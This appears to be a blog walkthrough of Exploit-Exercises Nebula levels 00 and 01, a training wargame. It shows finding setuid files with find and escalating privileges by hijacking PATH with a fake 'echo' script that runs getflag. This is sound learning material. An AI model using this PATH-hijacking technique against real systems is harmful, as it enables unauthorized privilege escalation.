Nebula 01 Agenda: “There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?”

1 level01@nebula:~$ /home/flag01/flag01
2 	and now what?
3 
4 level01@nebula:~$ which sh
5 	/bin/sh
6 
7 level01@nebula:~$ which getflag
8 	/bin/getflag

which is a Unix command used to identify the location of executables. A Unix shell is a command-line interpreter or shell that provides a traditional user interface for the Unix operating system. By definition on wiki, “env” is used to either print a list of environment variables or run another utility in an altered environment without having to modify the currently existing environment

That’s what we exacly need, replace echo with our own script.

1 level01@nebula:~$ cat > ./echo
2 	#!bin/sh
3 	/bin/getflag;

At the end of input, press “Ctrl+d”. TLDR: just a signal saying that this is the end of a text stream. Consequently, the “echo” script was created in home directory.

• “cat” is a standard Unix utility that will output the contents of a specific file and can be used to concatenate and list files.
• The ”>” symbol means standard output redirection.
• The dot(“.”) symbol, represents current directory (in our case, it’s level01 user’s home, “/home/level01”)
• The “#!” - called a shebang and tells the parent shell which interpreter should be used to execute the script.

1 level01@nebula:~$ chmod +x echo
2 
3 level01@nebula:~$ echo $PATH
4 /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
5 
6 level01@nebula:~$ export PATH=/home/level01/:$PATH
7 level01@nebula:~$ /home/flag01/flag01

links:

• http://en.wikipedia.org/wiki/PATH_(variable)
• http://stackoverflow.com/questions/7328223/unix-export-command

         Nebula 00 Agenda: “This level requires you to find a Set User ID program that will run as the “flag00” account. You could also find this by carefully looking in top level directories in/for suspicious looking directories.”

To omit all “permission denied” messages from “find” we can redirect the Standard Error Output from generally Display/Screen to some file (e.g. to a special file /dev/null) and avoid seeing the error messages on the screen! For more details, you can get acquainted with man util.

 1 $find / -user flag00 2>/dev/null
 2 
 3 	/bin/.../flag00
 4 	/home/flag00
 5 	/home/flag00/.bash_logout
 6 	/home/flag00/.bashrc
 7 	/home/flag00/.profile
 8 	/rofs/bin/.../flag00
 9 	/rofs/home/flag00
10 	/rofs/home/flag00/.bash_logout
11 	/rofs/home/flag00/.bashrc
12 	/rofs/home/flag00/.profile

It’s easy to notice those “suspicious looking directories”). BTW as we can find out that “rofs” (if you’re intrigued and noticed this of course) is a read-only filesystem that allows to create a read-only mountpoint of a read-write directory on the system (or at least, something similar =)). However, it doesn’t matter.

1 $ls -l /bin/.../flag00
2 	-rwsr-x--- 1 flag00 level00 7358 2011-11-20 21:22 /bin/.../flag00

At last, the execution of “/bin/…/flag00”, provide to such desirable hint. Therefore, the execution of “getflag” file is our general purpouse at each level.

PS. some useful links:

• wikipedia.org/wiki/Setuid
• wikipedia.org/wiki/File_system_permissions

If you’re looking for something fun-filled and aimed at absolute beginners, you can try wargame offered by OverTheWire community.

        Exploit-Exercises resource provides a variety of virtual machines, documentation and challenges that can be used to learn about a variety of computer security issues such as privilege escalation, vulnerability analysis, exploit development, debugging, reverse engineering, and general cyber security issues.

Here I will try to periodically publish and update my subjective solutions and views on this issues. I haven’t any assumptions for how long it will take to have enough for me, but let’s get going (with Nebula, an ideal place for people new to Linux exploitation =))

My thoughts is started here